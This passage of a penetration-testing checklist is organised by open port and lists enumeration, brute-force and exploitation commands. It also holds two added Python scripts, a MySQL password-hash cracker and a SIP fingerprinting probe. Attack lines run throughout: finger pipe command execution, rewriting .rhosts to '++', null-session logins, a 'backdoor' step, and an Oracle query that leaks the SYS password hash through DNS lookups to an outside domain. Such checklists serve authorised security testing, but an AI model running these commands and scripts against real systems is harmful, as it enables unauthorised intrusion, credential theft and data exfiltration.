16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

16.6.1.4. whois

16.6.1.4.1. -h Use the named host to resolve the query

16.6.1.4.2. -a Use ARIN to resolve the query

16.6.1.4.3. -r Use RIPE to resolve the query

16.6.1.4.4. -p Use APNIC to resolve the query

16.6.1.4.5. -Q Perform a quick lookup

16.6.2. DNS Enumeration

16.6.2.1. Bile Suite

16.6.2.1.1. perl BiLE.pl [website] [project_name]

16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

16.6.2.1.5. perl exp-tld.pl [input file] [output file]

16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

16.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

16.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

16.6.2.2. txdns

16.6.2.2.1. txdns -rt -t domain_name

16.6.2.2.2. txdns -x 50 -bb domain_name

16.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

16.6.2.3. nmap nse scripts

16.6.2.3.1. dns-random-srcport

16.6.2.3.2. dns-random-txid

16.6.2.3.3. dns-recursion

16.6.2.3.4. dns-zone-transfer

16.6.3. Examine Configuration Files

16.6.3.1. host.conf

16.6.3.2. resolv.conf

16.6.3.3. named.conf

16.7. TFTP port 69 open

16.7.1. TFTP Enumeration

16.7.1.1. tftp ip_address PUT local_file

16.7.1.2. tftp ip_address GET conf.txt (or other files)

16.7.1.3. Solarwinds TFTP server

16.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

16.7.2. TFTP Bruteforcing

16.7.2.1. TFTP bruteforcer

16.7.2.2. Cisco-Torch

16.8. Finger Port 79 open

16.8.1. User enumeration

16.8.1.1. finger 'a b c d e f g h' @example.com

16.8.1.2. finger [email protected]

16.8.1.3. finger [email protected]

16.8.1.4. finger [email protected]

16.8.1.5. finger [email protected]

16.8.1.6. finger **@example.com

16.8.1.7. finger [email protected]

16.8.1.8. finger @example.com

16.8.1.9. nmap nse script

16.8.1.9.1. finger

16.8.2. Command execution

16.8.2.1. finger "|/bin/[email protected]"

16.8.2.2. finger "|/bin/ls -a /@example.com"

16.8.3. Finger Bounce

16.8.3.1. finger user@host@victim

16.8.3.2. finger @internal@external

16.9. Web Ports 80,8080 etc. open

16.9.1. Fingerprint server

16.9.1.1. Telnet ip_address port

16.9.1.2. Firefox plugins

16.9.1.2.1. All

16.9.1.2.2. Specific

16.9.2. Crawl website

16.9.2.1. lynx [options] startfile/URL

16.9.2.1.1. Options include -traversal -crawl -dump -image_links -source

16.9.2.2. httprint

16.9.2.3. Metagoofil

16.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

16.9.3. Web Directory enumeration

16.9.3.1. Nikto

16.9.3.1.1. nikto [-h target] [options]

16.9.3.2. DirBuster

16.9.3.3. Wikto

16.9.3.4. Goolag Scanner

16.9.4. Vulnerability Assessment

16.9.4.1. Manual Tests

16.9.4.1.1. Default Passwords

16.9.4.1.2. Install Backdoors

16.9.4.1.3. Method Testing

16.9.4.1.4. Upload Files

16.9.4.1.5. View Page Source

16.9.4.1.6. Input Validation Checks

16.9.4.1.7. Automated table and column iteration

16.9.4.2. Vulnerability Scanners

16.9.4.2.1. Acunetix

16.9.4.2.2. Grendelscan

16.9.4.2.3. NStealth

16.9.4.2.4. Obiwan III

16.9.4.2.5. w3af

16.9.4.3. Specific Applications/ Server Tools

16.9.4.3.1. Domino

16.9.4.3.2. Joomla

16.9.4.3.3. aspaudit.pl

16.9.4.3.4. Vbulletin

16.9.4.3.5. ZyXel

16.9.5. Proxy Testing

16.9.5.1. Burpsuite

16.9.5.2. Crowbar

16.9.5.3. Interceptor

16.9.5.4. Paros

16.9.5.5. Requester Raw

16.9.5.6. Suru

16.9.5.7. WebScarab

16.9.6. Examine configuration files

16.9.6.1. Generic

16.9.6.1.1. Examine httpd.conf/ windows config files

16.9.6.2. JBoss

16.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/

16.9.6.3. Joomla

16.9.6.3.1. configuration.php

16.9.6.3.2. diagnostics.php

16.9.6.3.3. joomla.inc.php

16.9.6.3.4. config.inc.php

16.9.6.4. Mambo

16.9.6.4.1. configuration.php

16.9.6.4.2. config.inc.php

16.9.6.5. Wordpress

16.9.6.5.1. setup-config.php

16.9.6.5.2. wp-config.php

16.9.6.6. ZyXel

16.9.6.6.1. /WAN.html (contains PPPoE ISP password)

16.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

16.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

16.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

16.9.6.6.5. /CF_Keyword.html (Content Filter)

16.9.6.6.6. /RemMagWWW.html (Remote MGMT)

16.9.6.6.7. /rpSysAdmin.html (System)

16.9.6.6.8. /LAN_IP.html (LAN)

16.9.6.6.9. /NAT_General.html (NAT)

16.9.6.6.10. /ViewLog.html (Logs)

16.9.6.6.11. /rpFWUpload.html (Tools)

16.9.6.6.12. /DiagGeneral.html (Diagnostic)

16.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

16.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

16.9.6.6.15. Config Backups

16.9.7. Examine web server logs

16.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

16.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq

16.9.8. References

16.9.8.1. White Papers

16.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

16.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

16.9.8.1.3. Blind Security Testing - An Evolutionary Approach

16.9.8.1.4. Command Injection in XML Signatures and Encryption

16.9.8.1.5. Input Validation Cheat Sheet

16.9.8.1.6. SQL Injection Cheat Sheet

16.9.8.2. Books

16.9.8.2.1. Hacking Exposed Web 2.0

16.9.8.2.2. Hacking Exposed Web Applications

16.9.8.2.3. The Web Application Hacker's Handbook

16.9.9. Exploit Frameworks

16.9.9.1. Brute-force Tools

16.9.9.1.1. Acunetix

16.9.9.2. Metasploit

16.9.9.3. w3af

16.10. Portmapper port 111 open

16.10.1. rpcdump.py

16.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

16.10.2. rpcinfo

16.10.2.1. rpcinfo [options] IP_Address

16.11. NTP Port 123 open

16.11.1. NTP Enumeration

16.11.1.1. ntpdc -c monlist IP_ADDRESS

16.11.1.2. ntpdc -c sysinfo IP_ADDRESS

16.11.1.3. ntpq

16.11.1.3.1. host

16.11.1.3.2. hostname

16.11.1.3.3. ntpversion

16.11.1.3.4. readlist

16.11.1.3.5. version

16.11.2. Examine configuration files

16.11.2.1. ntp.conf

16.11.3. nmap nse script

16.11.3.1. ntp-info

16.12. NetBIOS Ports 135-139,445 open

16.12.1. NetBIOS enumeration

16.12.1.1. Enum

16.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

16.12.1.2. Null Session

16.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

16.12.1.3. Smbclient

16.12.1.3.1. smbclient -L //server/share password options

16.12.1.4. Superscan

16.12.1.4.1. Enumeration tab.

16.12.1.5. user2sid/sid2user

16.12.1.6. Winfo

16.12.2. NetBIOS brute force

16.12.2.1. Hydra

16.12.2.2. Brutus

16.12.2.3. Cain & Abel

16.12.2.4. getacct

16.12.2.5. NAT (NetBIOS Auditing Tool)

16.12.3. Examine Configuration Files

16.12.3.1. Smb.conf

16.12.3.2. lmhosts

16.13. SNMP port 161 open

16.13.1. Default Community Strings

16.13.1.1. public

16.13.1.2. private

16.13.1.3. cisco

16.13.1.3.1. cable-docsis

16.13.1.3.2. ILMI

16.13.2. MIB enumeration

16.13.2.1. Windows NT

16.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

16.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

16.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

16.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

16.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

16.13.2.2. Solarwinds MIB walk

16.13.2.3. Getif

16.13.2.4. snmpwalk

16.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

16.13.2.5. Snscan

16.13.2.6. Applications

16.13.2.6.1. ZyXel

16.13.2.7. nmap nse script

16.13.2.7.1. snmp-sysdescr

16.13.3. SNMP Bruteforce

16.13.3.1. onesixtyone

16.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>

16.13.3.2. cat

16.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

16.13.3.3. Solarwinds SNMP Brute Force

16.13.3.4. ADMsnmp

16.13.3.5. nmap nse script

16.13.3.5.1. snmp-brute

16.13.4. Examine SNMP Configuration files

16.13.4.1. snmp.conf

16.13.4.2. snmpd.conf

16.13.4.3. snmp-config.xml

16.14. LDAP Port 389 Open

16.14.1. ldap enumeration

16.14.1.1. ldapminer

16.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

16.14.1.2. luma

16.14.1.2.1. Gui based tool

16.14.1.3. ldp

16.14.1.3.1. Gui based tool

16.14.1.4. openldap

16.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

16.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

16.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.14.2. ldap brute force

16.14.2.1. bf_ldap

16.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate

16.14.2.1.2. Optional: -p port (default 389)

16.14.2.1.3. Optional: -v (verbose mode)

16.14.2.1.4. Optional: -P LDAP user path (default ,CN=Users,)

16.14.2.2. K0ldS

16.14.2.3. LDAP_Brute.pl

16.14.3. Examine Configuration Files

16.14.3.1. General

16.14.3.1.1. containers.ldif

16.14.3.1.2. ldap.cfg

16.14.3.1.3. ldap.conf

16.14.3.1.4. ldap.xml

16.14.3.1.5. ldap-config.xml

16.14.3.1.6. ldap-realm.xml

16.14.3.1.7. slapd.conf

16.14.3.2. IBM SecureWay V3 server

16.14.3.2.1. V3.sas.oc

16.14.3.3. Microsoft Active Directory server

16.14.3.3.1. msadClassesAttrs.ldif

16.14.3.4. Netscape Directory Server 4

16.14.3.4.1. nsslapd.sas_at.conf

16.14.3.4.2. nsslapd.sas_oc.conf

16.14.3.5. OpenLDAP directory server

16.14.3.5.1. slapd.sas_at.conf

16.14.3.5.2. slapd.sas_oc.conf

16.14.3.6. Sun ONE Directory Server 5.1

16.14.3.6.1. 75sas.ldif

16.15. PPTP/L2TP/VPN port 500/1723 open

16.15.1. Enumeration

16.15.1.1. ike-scan

16.15.1.2. ike-probe

16.15.2. Brute-Force

16.15.2.1. ike-crack

16.15.3. Reference Material

16.15.3.1. PSK cracking paper

16.15.3.2. SecurityFocus Infocus

16.15.3.3. Scanning a VPN Implementation

16.16. Modbus port 502 open

16.16.1. modscan

16.17. rlogin port 513 open

16.17.1. Rlogin Enumeration

16.17.1.1. Find the files

16.17.1.1.1. find / -name .rhosts

16.17.1.1.2. locate .rhosts

16.17.1.2. Examine Files

16.17.1.2.1. cat .rhosts

16.17.1.3. Manual Login

16.17.1.3.1. rlogin hostname -l username

16.17.1.3.2. rlogin <IP>

16.17.1.4. Subvert the files

16.17.1.4.1. echo ++ > .rhosts

16.17.2. Rlogin Brute force

16.17.2.1. Hydra

16.18. rsh port 514 open

16.18.1. Rsh Enumeration

16.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.18.2. Rsh Brute Force

16.18.2.1. rsh-grind

16.18.2.2. Hydra

16.18.2.3. medusa

16.19. SQL Server Port 1433 1434 open

16.19.1. SQL Enumeration

16.19.1.1. piggy

16.19.1.2. SQLPing

16.19.1.2.1. sqlping ip_address/hostname

16.19.1.3. SQLPing2

16.19.1.4. SQLPing3

16.19.1.5. SQLpoke

16.19.1.6. SQL Recon

16.19.1.7. SQLver

16.19.2. SQL Brute Force

16.19.2.1. SQLPAT

16.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

16.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

16.19.2.2. SQL Dict

16.19.2.3. SQLAT

16.19.2.4. Hydra

16.19.2.5. SQLlhf

16.19.2.6. ForceSQL

16.20. Citrix port 1494 open

16.20.1. Citrix Enumeration

16.20.1.1. Default Domain

16.20.1.2. Published Applications

16.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

16.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

16.20.2. Citrix Brute Force

16.20.2.1. bforce.js

16.20.2.2. connect.js

16.20.2.3. Citrix Brute-forcer

16.20.2.4. Reference Material

16.20.2.4.1. Hacking Citrix - the legitimate backdoor

16.20.2.4.2. Hacking Citrix - the forceful way

16.21. Oracle Port 1521 Open

16.21.1. Oracle Enumeration

16.21.1.1. oracsec

16.21.1.2. Repscan

16.21.1.3. Sidguess

16.21.1.4. Scuba

16.21.1.5. DNS/HTTP Enumeration

16.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

16.21.1.6. WinSID

16.21.1.7. Oracle default password list

16.21.1.8. TNSVer

16.21.1.8.1. tnsver host [port]

16.21.1.9. TCP Scan

16.21.1.10. Oracle TNSLSNR

16.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

16.21.1.11. TNSCmd

16.21.1.11.1. perl tnscmd.pl -h ip_address

16.21.1.11.2. perl tnscmd.pl version -h ip_address

16.21.1.11.3. perl tnscmd.pl status -h ip_address

16.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

16.21.1.12. LSNrCheck

16.21.1.13. Oracle Security Check (needs credentials)

16.21.1.14. OAT

16.21.1.14.1. sh opwg.sh -s ip_address

16.21.1.14.2. opwg.bat -s ip_address

16.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

16.21.1.15. OScanner

16.21.1.15.1. sh oscanner.sh -s ip_address

16.21.1.15.2. oscanner.exe -s ip_address

16.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

16.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

16.21.1.16. NGS Squirrel for Oracle

16.21.1.17. Service Register

16.21.1.17.1. Service-register.exe ip_address

16.21.1.18. PLSQL Scanner 2008

16.21.2. Oracle Brute Force

16.21.2.1. OAK

16.21.2.1.1. ora-getsid hostname port sid_dictionary_list

16.21.2.1.2. ora-auth-alter-session host port sid username password sql

16.21.2.1.3. ora-brutesid host port start

16.21.2.1.4. ora-pwdbrute host port sid username password-file

16.21.2.1.5. ora-userenum host port sid userlistfile

16.21.2.1.6. ora-ver -e (-f -l -a) host port

16.21.2.2. breakable (Targets Application Server Port)

16.21.2.2.1. breakable.exe host url [port] [v]

16.21.2.2.1.1. host - ip_address of the Oracle Portal Server

16.21.2.2.1.2. url - PATH_INFO i.e. /pls/orasso

16.21.2.2.1.3. port - TCP port the Oracle Portal Server is serving pages from

16.21.2.2.1.4. v - verbose

16.21.2.3. SQLInjector (Targets Application Server Port)

16.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

16.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

16.21.2.4. Check Password

16.21.2.5. orabf

16.21.2.5.1. orabf [hash]:[username] [options]

16.21.2.6. thc-orakel

16.21.2.6.1. Cracker

16.21.2.6.2. Client

16.21.2.6.3. Crypto

16.21.2.7. DBVisualisor

16.21.2.7.1. Sql scripts from pentest.co.uk

16.21.2.7.2. Manual SQL input of previously reported vulnerabilities

16.21.3. Oracle Reference Material

16.21.3.1. Understanding SQL Injection

16.21.3.2. SQL Injection walkthrough

16.21.3.3. SQL Injection by example

16.21.3.4. Advanced SQL Injection in Oracle databases

16.21.3.5. Blind SQL Injection

16.21.3.6. SQL Cheatsheets

16.22. NFS Port 2049 open

16.22.1. NFS Enumeration

16.22.1.1. showmount -e hostname/ip_address

16.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.22.2. NFS Brute Force

16.22.2.1. Interact with NFS share and try to add/delete

16.22.2.2. Exploit and Confuse Unix

16.22.3. Examine Configuration Files

16.22.3.1. /etc/exports

16.22.3.2. /etc/lib/nfs/xtab

16.22.4. nmap nse script

16.22.4.1. nfs-showmount

16.23. Compaq/HP Insight Manager Ports 2301, 2381 open

16.23.1. HP Enumeration

16.23.1.1. Authentication Method

16.23.1.1.1. Host OS Authentication

16.23.1.1.2. Default Authentication

16.23.1.2. Wikto

16.23.1.3. Nstealth

16.23.2. HP Bruteforce

16.23.2.1. Hydra

16.23.2.2. Acunetix

16.23.3. Examine Configuration Files

16.23.3.1. path.properties

16.23.3.2. mx.log

16.23.3.3. CLIClientConfig.cfg

16.23.3.4. database.props

16.23.3.5. pg_hba.conf

16.23.3.6. jboss-service.xml

16.23.3.7. .namazurc

16.24. MySQL port 3306 open

16.24.1. Enumeration

16.24.1.1. nmap -A -n -p3306 <IP Address>

16.24.1.2. nmap -A -n -Pn --script=all -p3306 <IP Address>

16.24.1.3. telnet IP_Address 3306

16.24.1.4. use test; select * from test;

16.24.1.5. To check for other DBs -- show databases;

16.24.2. Administration

16.24.2.1. MySQL Network Scanner

16.24.2.2. MySQL GUI Tools

16.24.2.3. mysqlshow

16.24.2.4. mysqlbinlog

16.24.3. Manual Checks

16.24.3.1. Default usernames and passwords

16.24.3.1.1. username: root password:

16.24.3.1.2. testing

16.24.3.2. Configuration Files

16.24.3.2.1. Operating System

16.24.3.2.2. Command History

16.24.3.2.3. Log Files

16.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

16.24.3.2.5. MySQL data directory (Location specified in my.cnf)

16.24.3.2.6. SSL Check

16.24.3.3. Privilege Escalation

16.24.3.3.1. Current Level of access

16.24.3.3.2. Access passwords

16.24.3.3.3. Create a new user and grant him privileges

16.24.3.3.4. Break into a shell
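The "Default usernames and passwords" and "Access passwords" steps above come together once you can read mysql.user: blank passwords are visible directly, and the 41-character hashes MySQL 4.1+ stores for mysql_native_password are unsalted SHA1(SHA1(password)), so a short wordlist checks every row at once. The following is an added example, not a tool from the original checklist; the rows and the wordlist are constructed for the demo, the user@host labels are invented, and pre-4.1 16-character hashes and plugin authentication (caching_sha2_password and friends) are deliberately left unhandled.

```python
"""Check a dumped mysql.user table for blank and weak passwords (added example, constructed rows)."""
import hashlib
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed rows in the shape of:  SELECT user, host, password FROM mysql.user;
# (on MySQL 5.7+ the column is authentication_string). The second hash is
# PASSWORD('password') and the third PASSWORD('123456') on MySQL 4.1+; the fourth
# is a placeholder in the pre-4.1 16-hex-character format, not a real hash.
SAMPLE_USERS: List[Tuple[str, str, str]] = [
    ("root", "localhost", ""),
    ("root", "%", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("app", "10.0.0.%", "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9"),
    ("backup", "localhost", "0123456789abcdef"),
]

# Constructed wordlist; a real run would use the usual default/guessable lists.
WORDLIST = ["", "root", "mysql", "admin", "password", "123456"]


def mysql_native_hash(password: str) -> str:
    """PASSWORD() as stored for mysql_native_password: '*' + SHA1(SHA1(pw)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_users(rows: Iterable[Tuple[str, str, str]],
                wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map 'user@host' to the recovered password ('' for a blank password) or None."""
    # The hash is unsalted, so one precomputed table covers every row.
    table = {mysql_native_hash(w): w for w in wordlist}
    result: Dict[str, Optional[str]] = {}
    for user, host, stored in rows:
        key = f"{user}@{host}"
        if stored == "":
            result[key] = ""            # no password at all: mysql -u user -h host with an empty password
        elif stored.startswith("*") and len(stored) == 41:
            result[key] = table.get(stored.upper())
        else:
            result[key] = None          # pre-4.1 hash or plugin auth, not covered by this check
    return result


if __name__ == "__main__":
    for account, pw in audit_users(SAMPLE_USERS, WORDLIST).items():
        state = "BLANK PASSWORD" if pw == "" else (f"cracked: {pw!r}" if pw else "not recovered")
        print(f"{account:<20} {state}")
```

The host column matters as much as the password: root@localhost with a blank password is only reachable once you already have a shell on the box, while root@% with a guessable password is reachable by anyone who can hit 3306.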

16.24.4. SQL injection

16.24.4.1. mysql-miner.pl

16.24.4.1.1. mysql-miner.pl http://target/ expected_string database

16.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

16.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

16.24.5. References

16.24.5.1. Design Weaknesses

16.24.5.1.1. MySQL running as root

16.24.5.1.2. Exposed publicly on Internet

16.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

16.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

16.25. RDesktop port 3389 open

16.25.1. Rdesktop Enumeration

16.25.1.1. Remote Desktop Connection

16.25.2. Rdesktop Bruteforce

16.25.2.1. TSGrinder

16.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

16.25.2.2. Tscrack

16.26. Sybase Port 5000+ open

16.26.1. Sybase Enumeration

16.26.1.1. sybase-version ip_address from NGS

16.26.2. Sybase Vulnerability Assessment

16.26.2.1. Use DBVisualiser

16.26.2.1.1. Sybase Security checksheet

16.26.2.1.2. Manual SQL input of previously reported vulnerabilities

16.26.2.2. NGS Squirrel for Sybase

16.27. SIP Port 5060 open

16.27.1. SIP Enumeration

16.27.1.1. netcat

16.27.1.1.1. nc IP_Address Port

16.27.1.2. sipflanker

16.27.1.2.1. python sipflanker.py 192.168.1-254

16.27.1.3. Sipscan

16.27.1.4. smap

16.27.1.4.1. smap IP_Address/Subnet_Mask

16.27.1.4.2. smap -o IP_Address/Subnet_Mask

16.27.1.4.3. smap -l IP_Address

16.27.2. SIP Packet Crafting etc.

16.27.2.1. sipsak

16.27.2.1.1. Tracing paths: - sipsak -T -s sip:username@domain

16.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain

16.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

16.27.2.2. siprogue
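The sipsak OPTIONS request above is the single most useful SIP probe: a user agent or proxy answers it whether or not the user exists, and the Server/User-Agent and Allow headers in the reply identify the stack. The following is an added example, not a tool from the original checklist, that builds the same RFC 3261 OPTIONS request, sends it over UDP, and pulls the fingerprint fields out of the response. The reply it parses offline is constructed for the demo; the addresses, the extension number 100 and the "scanner" identity are invented.

```python
"""Craft a SIP OPTIONS probe and fingerprint the reply (added example, constructed response)."""
import random
import socket
import string
from typing import Dict, Optional, Tuple

# Constructed reply in the shape an Asterisk-style UAS returns to an OPTIONS probe.
SAMPLE_RESPONSE = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 10.0.0.2:5060;branch=z9hG4bK0123456789ab;received=10.0.0.2;rport=5060\r\n"
    b"From: <sip:scanner@10.0.0.2>;tag=1a2b3c4d\r\n"
    b"To: <sip:100@10.0.0.1>;tag=as7f3e2c1b\r\n"
    b"Call-ID: 0123456789abcdef@10.0.0.2\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Server: Asterisk PBX 1.4.21\r\n"
    b"Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\n"
    b"Supported: replaces\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def _token(n: int) -> str:
    """Random lower-case hex token for branch, tag and Call-ID values."""
    return "".join(random.choices("0123456789abcdef", k=n))


def build_options(domain: str, local_ip: str, local_port: int = 5060, user: str = "100") -> bytes:
    """Build an RFC 3261 OPTIONS request for sip:user@domain (what sipsak -s sends)."""
    lines = [
        f"OPTIONS sip:{user}@{domain} SIP/2.0",
        # The branch must start with the z9hG4bK magic cookie; rport asks the far end
        # to reply to the source port we actually sent from.
        f"Via: SIP/2.0/UDP {local_ip}:{local_port};branch=z9hG4bK{_token(12)};rport",
        "Max-Forwards: 70",
        f"From: <sip:scanner@{local_ip}>;tag={_token(8)}",
        f"To: <sip:{user}@{domain}>",
        f"Call-ID: {_token(16)}@{local_ip}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:scanner@{local_ip}:{local_port}>",
        "Accept: application/sdp",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_response(data: bytes) -> Tuple[int, str, Dict[str, str]]:
    """Split a SIP response into (status code, reason phrase, lower-cased header map)."""
    head = data.split(b"\r\n\r\n", 1)[0].decode("utf-8", errors="replace")
    status, *header_lines = head.split("\r\n")
    parts = status.split(" ", 2)
    code = int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, reason, headers


def fingerprint(data: bytes) -> Dict[str, str]:
    """Pull the fields that identify the stack; a 404 for an unknown user carries them too."""
    code, reason, h = parse_response(data)
    return {
        "status": f"{code} {reason}",
        "server": h.get("server") or h.get("user-agent") or "unknown",
        "allow": h.get("allow", ""),
        "supported": h.get("supported", ""),
    }


def probe(target: str, port: int = 5060, timeout: float = 2.0) -> Optional[Dict[str, str]]:
    """Send the OPTIONS probe over UDP and fingerprint the reply; None if nothing comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((target, port))
        local_ip, local_port = s.getsockname()
        s.send(build_options(target, local_ip, local_port))
        try:
            return fingerprint(s.recv(4096))
        except socket.timeout:
            return None


if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE))   # offline demo on the constructed reply
```

Run probe("target-ip") against a live host to get the same dictionary; the Allow list tells you which methods (REGISTER, INVITE, SUBSCRIBE) are worth exercising with sipsak, SIPVicious or the flooders listed above.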

16.27.3. SIP Vulnerability Scanning/ Brute Force

16.27.3.1. tftp bruteforcer

16.27.3.1.1. Default dictionary file

16.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

16.27.3.2. VoIPaudit

16.27.3.3. SiVuS

16.27.4. Examine Configuration Files

16.27.4.1. SIPDefault.cnf

16.27.4.2. asterisk.conf

16.27.4.3. sip.conf

16.27.4.4. phone.conf

16.27.4.5. sip_notify.conf

16.27.4.6. <Ethernet address>.cfg

16.27.4.7. 000000000000.cfg

16.27.4.8. phone1.cfg

16.27.4.9. sip.cfg etc. etc.

16.28. VNC port 5900+ open

16.28.1. VNC Enumeration

16.28.1.1. Scans

16.28.1.1.1. 5900+ for direct access (display N listens on 5900+N); 5800+ for HTTP access.

16.28.2. VNC Brute Force

16.28.2.1. Password Attacks

16.28.2.1.1. Remote

16.28.2.1.2. Local

16.28.3. Examine Configuration Files

16.28.3.1. .vnc

16.28.3.2. /etc/vnc/config

16.28.3.3. $HOME/.vnc/config

16.28.3.4. /etc/sysconfig/vncservers

16.28.3.5. /etc/vnc.conf

16.29. X11 port 6000+ open

16.29.1. X11 Enumeration

16.29.1.1. List open windows

16.29.1.2. Authentication Method

16.29.1.2.1. Xauth

16.29.1.2.2. Xhost

16.29.2. X11 Exploitation

16.29.2.1. xwd

